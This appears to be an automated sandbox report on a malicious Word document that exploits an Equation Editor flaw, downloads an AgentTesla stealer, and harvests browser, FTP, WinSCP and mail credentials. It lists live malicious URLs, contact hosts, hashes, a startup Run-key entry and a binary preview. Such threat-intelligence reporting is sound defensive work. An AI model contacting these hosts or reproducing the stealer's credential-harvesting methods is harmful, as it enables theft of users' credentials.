Source: Yara match	File source: Process Memory Space: twox67345.exe PID: 2292, type: MEMORY
Source: Yara match	File source: Process Memory Space: twox67345.exe PID: 2952, type: MEMORY
Source: Yara match	File source: 11.2.UGxXf.exe.39bd920.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.twox67345.exe.38b4700.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.twox67345.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UGxXf.exe.3974700.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.twox67345.exe.38fd920.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.UGxXf.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UGxXf.exe.3974700.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.twox67345.exe.38fd920.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UGxXf.exe.39bd920.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.twox67345.exe.38b4700.9.raw.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Roaming\twox67345.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\AppData\Roaming\twox67345.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\twox67345.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 00000009.00000002.2360157880.0000000002701000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: twox67345.exe PID: 2952, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000009.00000002.2360157880.0000000002701000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2274734212.000000000368E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2360028702.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2358876665.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2358961317.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2334670047.000000000374E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UGxXf.exe PID: 2500, type: MEMORY
Source: Yara match	File source: Process Memory Space: twox67345.exe PID: 2292, type: MEMORY
Source: Yara match	File source: Process Memory Space: twox67345.exe PID: 2952, type: MEMORY
Source: Yara match	File source: 11.2.UGxXf.exe.39bd920.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.twox67345.exe.38b4700.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.twox67345.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UGxXf.exe.3974700.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.twox67345.exe.38fd920.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.UGxXf.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UGxXf.exe.3974700.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.twox67345.exe.38fd920.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.UGxXf.exe.39bd920.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.twox67345.exe.38b4700.9.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation111	Registry Run Keys / Startup Folder1	Process Injection112	Disable or Modify Tools1	OS Credential Dumping2	File and Directory Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder1	Obfuscated Files or Information1	Input Capture11	System Information Discovery114	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter1	Logon Script (Windows)	Logon Script (Windows)	Timestomp1	Credentials in Registry1	Security Software Discovery221	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Masquerading1	NTDS	Virtualization/Sandbox Evasion14	Distributed Component Object Model	Input Capture11	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion14	LSA Secrets	Process Discovery2	SSH	Clipboard Data1	Data Transfer Size Limits	Application Layer Protocol132	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Process Injection112	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Hidden Files and Directories1	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
payment_advice.doc	44%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\twox67345.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exe	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Roaming\twox67345.exe	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
9.2.twox67345.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1138205		Download File
16.2.UGxXf.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1138205		Download File

Domains

Source	Detection	Scanner	Label	Link
mail.tpcdel.com	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://coroloboxorozor.com/base/4AE44766E50C275550C63C95498C19FE.html	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://tunedinblog.com/wp-includes/twox.exe	100%	Avira URL Cloud	malware
http://coroloboxorozor.com	0%	Avira URL Cloud	safe
http://coroloboxorozor.com/base/C56E2AF17B6C065E85DB9FFDA54E4A78.html	0%	Avira URL Cloud	safe
https://n2pGpXVLT5FR.net	0%	Avira URL Cloud	safe
http://mail.tpcdel.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mail.tpcdel.com	103.35.120.75	true	true	2%, Virustotal, Browse	unknown
coroloboxorozor.com	172.67.172.17	true	false		unknown
tunedinblog.com	150.95.81.183	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://coroloboxorozor.com/base/4AE44766E50C275550C63C95498C19FE.html	false	Avira URL Cloud: safe	unknown
http://tunedinblog.com/wp-includes/twox.exe	true	Avira URL Cloud: malware	unknown
http://coroloboxorozor.com/base/C56E2AF17B6C065E85DB9FFDA54E4A78.html	false	Avira URL Cloud: safe	unknown
https://n2pGpXVLT5FR.net	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.%s.comPA	twox67345.exe, 00000004.00000002.2283901109.00000000059F0000.00000002.00000001.sdmp, twox67345.exe, 00000009.00000002.2363872886.0000000005DA0000.00000002.00000001.sdmp, UGxXf.exe, 0000000B.00000002.2341353479.0000000005A80000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	twox67345.exe, 00000004.00000002.2283901109.00000000059F0000.00000002.00000001.sdmp, twox67345.exe, 00000009.00000002.2363872886.0000000005DA0000.00000002.00000001.sdmp, UGxXf.exe, 0000000B.00000002.2341353479.0000000005A80000.00000002.00000001.sdmp	false		high
http://coroloboxorozor.com	twox67345.exe, 00000004.00000002.2272663469.00000000022D1000.00000004.00000001.sdmp, UGxXf.exe, 0000000B.00000002.2330351390.0000000002391000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	twox67345.exe, 00000004.00000002.2272663469.00000000022D1000.00000004.00000001.sdmp, UGxXf.exe, 0000000B.00000002.2330351390.0000000002391000.00000004.00000001.sdmp	false		high
http://mail.tpcdel.com	twox67345.exe, 00000009.00000002.2360313482.0000000002814000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.172.17	unknown	United States	13335	CLOUDFLARENETUS	false
150.95.81.183	unknown	Singapore	135161	GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG	true
103.35.120.75	unknown	India	9430	STPI-NOIDASoftwareTechnologyParksofIndiaBlock-IVIN	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356799
Start date:	23.02.2021
Start time:	16:53:01
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 55s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	payment_advice.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winDOC@20/9@10/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.6% (good quality ratio 0.1%) Quality average: 7.4% Quality standard deviation: 23.3%
HCA Information:	Successful, ratio: 96% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe TCP Packets have been reduced to 100 Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:53:37	API Interceptor	127x Sleep call for process: EQNEDT32.EXE modified
16:53:43	API Interceptor	554x Sleep call for process: twox67345.exe modified
16:55:09	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ZozjABYW C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe
16:55:18	API Interceptor	334x Sleep call for process: UGxXf.exe modified
16:55:18	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ZozjABYW C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
172.67.172.17	New Order 2300030317388 InterMetro.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/26C9E19CD43562C78CD12FB7DF6FEC19.html
	CN-Invoice-XXXXX9808-19011143287989.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/EFDD2E5486C74022C50C219C9576AB0D.html
	SecuriteInfo.com.Variant.Bulz.368783.31325.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/753007B764720AC1F46C7741AC807FF3.html
	0603321WG_0_1 pdf.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/008D1C43D45C0A742A0D32B591796DBD.html
	Payment_pdf.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/4E6D09D3FE7F5C729D5893BBC810E319.html
	RG6ws8jWUJ.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/45B656EF859B906DB2A5636A30447A39.html
	VIws8bzjD5.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/C56E2AF17B6C065E85DB9FFDA54E4A78.html
	PURCHASE ITEMS.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/67217E30C926335AF77F6F876C4096EF.html
	CN-Invoice-XXXXX9808-19011143287992.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/B7EE0CB8A1B54170208E8AC026859710.html
	quotation_PR # 00459182..exe	Get hash	malicious	Browse	coroloboxorozor.com/base/4FD4067B934700360B786D96F374CFDE.html
	PAYMENTADVICENOTE103_SWIFTCOPY0909208.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/79E1649C3374034D720AAEAD0A4C189E.html
	XP 6.xlsx	Get hash	malicious	Browse	coroloboxorozor.com/base/753007B764720AC1F46C7741AC807FF3.html
	PAYRECEIPT.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/FB9E1E734185F7528241A9972CE86875.html
	PO#87498746510.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/DDE952AA72FAB0CCAD37093397BB54C4.html
	TT.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/67C230E277706E38533C2138734032C2.html
	Payment_pdf.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/07E3F6F835A7792863F708E23906CE42.html
	TT.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/40B9FF72D3F4D8DF64BA5DD4E106BE04.html
	Invoices.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/E8B364AD7156AB4D7DED9F03FD919CE3.html
	Authorization Letter for Hiretech.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/94373684A3FEEB5727B680244074B411.html
	Doc_3975465846584657465846486435454,pdf.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/92C7F4831C860C5A2BD3269A6771BC0C.html

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
mail.tpcdel.com	VIws8bzjD5.exe	Get hash	malicious	Browse	103.35.120.75
	30998-pdf.exe	Get hash	malicious	Browse	103.35.120.75
	swift_copy_pdf.exe	Get hash	malicious	Browse	103.35.120.75
	76a1YdPyL5.exe	Get hash	malicious	Browse	103.35.120.75
	purchase_order_pdf.exe	Get hash	malicious	Browse	103.35.120.75
	wire_transfer.pdf.exe	Get hash	malicious	Browse	103.35.120.75
	wire transfer payment.exe	Get hash	malicious	Browse	103.35.120.75
	Payment advice.exe	Get hash	malicious	Browse	103.35.120.75
	UPDATED SOA.exe	Get hash	malicious	Browse	103.35.120.75
	2k6NyeiHKE.exe	Get hash	malicious	Browse	103.35.120.75
coroloboxorozor.com	New Order 2300030317388 InterMetro.exe	Get hash	malicious	Browse	172.67.172.17
	CN-Invoice-XXXXX9808-19011143287989.exe	Get hash	malicious	Browse	172.67.172.17
	SecuriteInfo.com.Variant.Bulz.368783.31325.exe	Get hash	malicious	Browse	104.21.71.230
	PRICE LIST (NOVEMBER 2020).exe	Get hash	malicious	Browse	104.21.71.230
	A4-058000200390-10-14_REV_pdf.exe	Get hash	malicious	Browse	104.21.71.230
	Purchase_order_397484658464974945648447564845.exe	Get hash	malicious	Browse	104.21.71.230
	0603321WG_0_1 pdf.exe	Get hash	malicious	Browse	172.67.172.17
	Payment_pdf.exe	Get hash	malicious	Browse	172.67.172.17
	RG6ws8jWUJ.exe	Get hash	malicious	Browse	172.67.172.17
	VIws8bzjD5.exe	Get hash	malicious	Browse	104.21.71.230
	PURCHASE ITEMS.exe	Get hash	malicious	Browse	172.67.172.17
	CN-Invoice-XXXXX9808-19011143287992.exe	Get hash	malicious	Browse	172.67.172.17
	quotation_PR # 00459182..exe	Get hash	malicious	Browse	104.21.71.230
	PURCHASE ORDER CONFIRMATION.exe	Get hash	malicious	Browse	104.21.71.230
	PAYMENTADVICENOTE103_SWIFTCOPY0909208.exe	Get hash	malicious	Browse	172.67.172.17
	XP 6.xlsx	Get hash	malicious	Browse	172.67.172.17
	PAYRECEIPT.exe	Get hash	malicious	Browse	104.21.71.230
	New Order.exe	Get hash	malicious	Browse	104.21.71.230
	PO#87498746510.exe	Get hash	malicious	Browse	172.67.172.17
	TT.exe	Get hash	malicious	Browse	172.67.172.17

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG	Order KV_RQ-74368121doc.rtf	Get hash	malicious	Browse	150.95.81.183
	inquiry.doc	Get hash	malicious	Browse	150.95.81.183
	receipt.doc	Get hash	malicious	Browse	150.95.81.183
	Purchase Order KVRQ-743012021.doc	Get hash	malicious	Browse	150.95.81.183
	Proforma Invoice.doc	Get hash	malicious	Browse	150.95.81.183
	902178.rtf	Get hash	malicious	Browse	150.95.81.183
	Vendor from.doc	Get hash	malicious	Browse	150.95.81.183
	Proforma Invoice.doc	Get hash	malicious	Browse	150.95.81.183
	ENQUIRY.doc	Get hash	malicious	Browse	150.95.81.183
	Paymentadvise.doc	Get hash	malicious	Browse	150.95.81.183
	USD21053.00.doc	Get hash	malicious	Browse	150.95.81.183
	scan-021521DHL delivery.doc	Get hash	malicious	Browse	150.95.81.183
	scan-021521DHL delivery doc.doc	Get hash	malicious	Browse	150.95.81.183
	New Order.doc	Get hash	malicious	Browse	150.95.81.183
	Factura021121_pdf.doc	Get hash	malicious	Browse	150.95.81.183
	Corporation Bank.doc	Get hash	malicious	Browse	150.95.81.183
	S519123519485518465.doc	Get hash	malicious	Browse	150.95.81.183
	SEA LION QUOTATION.doc	Get hash	malicious	Browse	150.95.81.183
	New Order 09022021.doc	Get hash	malicious	Browse	150.95.81.183
	PO-202002FIVEBRO.doc	Get hash	malicious	Browse	150.95.81.183
CLOUDFLARENETUS	Purchase Order.exe	Get hash	malicious	Browse	104.21.19.200
	dot crypted.exe	Get hash	malicious	Browse	104.21.19.200
	New Order 2300030317388 InterMetro.exe	Get hash	malicious	Browse	172.67.172.17
	CN-Invoice-XXXXX9808-19011143287989.exe	Get hash	malicious	Browse	172.67.172.17
	Purchase Order list.exe	Get hash	malicious	Browse	104.21.23.61
	RkoKlvuLh6.exe	Get hash	malicious	Browse	162.159.136.232
	i0fOtOV8v0.exe	Get hash	malicious	Browse	104.23.99.190
	P3knxzE7wN.exe	Get hash	malicious	Browse	162.159.128.233
	zLyXzE7WZi.exe	Get hash	malicious	Browse	162.159.138.232
	wLy18x5e2o.exe	Get hash	malicious	Browse	162.159.136.232
	QJ2UZbJWDS.exe	Get hash	malicious	Browse	162.159.136.232
	12ojLsHzee.exe	Get hash	malicious	Browse	162.159.128.233
	seed.exe	Get hash	malicious	Browse	104.21.76.242
	SWW8Mmeq6o.exe	Get hash	malicious	Browse	162.159.135.232
	iY2FJ1t6Nk.exe	Get hash	malicious	Browse	162.159.138.232
	BIb5AQZOu9.exe	Get hash	malicious	Browse	104.23.98.190
	egwbnzACBa.exe	Get hash	malicious	Browse	162.159.137.232
	N8MwnxcRDv.exe	Get hash	malicious	Browse	162.159.137.232
	7XJCrOkoIy.exe	Get hash	malicious	Browse	162.159.135.232
	fNOZjHL61d.exe	Get hash	malicious	Browse	104.23.98.190

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exe	VIws8bzjD5.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Roaming\twox67345.exe	VIws8bzjD5.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	VIws8bzjD5.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	629624
Entropy (8bit):	4.318973025796057
Encrypted:	false
SSDEEP:	6144:hB3ot6JPVsT7zFoRtMDC7lCAKSU3bd2SAHQBX/Mm+4bQLQUNStT:hlXfizFytMAlabES7MZEC/NMT
MD5:	3DC83F17122DD592D607424A54C1E9CB
SHA1:	CA3F7E0FAC52D80B1680994E8B07A4B7E589D6A4
SHA-256:	D5582D586F46F61240CED5F4A44DAC22D5E2C7C0A48F63C964093DE0CBE49BC8
SHA-512:	53676DD5D8C5957F84E512951353B7962529944EDEE3C4B8EB80D68EDDAACFE45AAD3843A1FC6406506223F1EE1317DF47A731A901BABB9CEE696CFB391DDC3C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 38%
Joe Sandbox View:	Filename: VIws8bzjD5.exe, Detection: malicious, Browse
IE Cache URL:	http://tunedinblog.com/wp-includes/twox.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}...............0..\|............... ........@.. ...............................~....@....................................W.......................x............................................................ ............... ..H............text...4{... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Xa..\|9...........................................................".(......s.........s.........s.........s.........B.(.......(........0...........rX..p....r\..p....s........+... .......(...+o,.......88.......(-...........(........(.................(/...o%...&.....(0...........:...................o'.........o1.......8........*........$.j........0...........rh..p....r~..p....s........+...$.......(...+o,.......88.......(-...........(........(.................(/...o%..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B08F3ED-537D-406E-B057-1B1541B1D39D}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C67C7B4A-7023-4170-93C2-146687425423}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	11560
Entropy (8bit):	3.613207132287162
Encrypted:	false
SSDEEP:	192:Oicjz5KZl05KRAPe1bnJbISzXCxERQLUEtryT/o5PWoC91en66UTDOu/FhXu+blZ:Oicj8Zl05KR7deH5Q/mcfenvU3vFhZb/
MD5:	F9F8BD9BC8E38FD4E0FB53B2DA587203
SHA1:	6935420F6974FEDD817DF65C5558C2D9311C745F
SHA-256:	1C812ED3BB1C464EB050B589BFD1636EFBEDAFA79D1C25D5DBA92377006F50D1
SHA-512:	BEAF6D6ED71DF1DEBC4920087D161D9CF3DE5FC9B47578EBC5501B9660E3F97E23130E6238EBF43DD62C0178E9EAEDC9A91471890FA560C718C9CDF4C7E7B737
Malicious:	false
Preview:	%.4.?._.7.&.?.`.?.].>.`.4.,.:.~.:...9.?.).7.~.,.)...=.?.?.'.,.;.9.?.0...=.@.?.-..?.#...!.9./.6.=...<.2.:.>.8.1.$.:._.'.?.`.~.-.?.4.!.?.].6.6.3.3.'.(.?.'.?.,.(.=.?.[.(.`.<.%.?.~....+.%.(.?.=.8.>.&.-.4.>./.=...!.6.~.?.?.?.6...%.<...'.!.$.1.%.^.!.#.,.?.(.?.1.:.^._.$.=.4...4.?.$.?.%.6.>.-.].9.;.3.).?...;.-.(./.9.\|.!._.%.>.<....-.>...!.,.$.].].2.^.3..[.(.?.$.#.).&.\|.(...?.?...'.'.?.<....`.@.=.(.?.<.<.;.).~.....(.?.4.#.?.3.6.1.?.5..._.@.,.+..,.].&.1.(...?.....,...$.=.?.,.?.%.4.?.4.4.7.`.?.0.;.%.&.?.8.2.0.&.?.=.4.8.?.#.0.5...4.1...5./.`.[.8.,.$.).1.\|.?.>./...,.!.#.#.3.'.1..?.?./.<.0.4.9.?.%.2.+.4.6...;.2.(.<.5.>.)...&.=.&.'.?.8.[.^.6.!.).+.[.2.!.%.0.9.`.?.%.?.~.2.].'.>.,.$.+.5.1.:.0.[.%.3.9.6.].&.%.?.8.0.....?.!.3.#.?./.3.^.%.%.#./.)._.^.8.+.].0.%.#.?.0.=.+...?.1.;.~.!.<.7.5.:.?./.`.?.?.?._.(.7.9.`.:.'.^.).<.].'./.2.4.:.?._.9.[..0.`.>.$.[.?._...`...2.?...#._.?.$.>.$.<.=.5.~.)...1.@.2...../.-.9.=.6.....%.6.^.\|..).,.4..8.].?.2.<._.).%.9.?.9.7.$.^.2.-.&.6.'.`.'.9.9.!.5.5.5.?.?.!.).^.).

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	80
Entropy (8bit):	4.446596383178742
Encrypted:	false
SSDEEP:	3:M1uauUlN1IUuUlmX1uauUlv:MsaXCUDad
MD5:	581FBF2AE768840AB0B959F0F569678B
SHA1:	0C573C2C44247C81D0C310489B7A04294A663404
SHA-256:	58F36BD775B77EC9D94614C1E4932A833C2F79FF74512166701FF301F4E1AC9E
SHA-512:	DF3C078CAA5688BDF95292781F36D00EE1ABEAE13A2D559B6AB026D16DA97846FCC1DC32BAA4082A12662BAC33CBE83332AA05C67A1440499C6443AB21890EC2
Malicious:	false
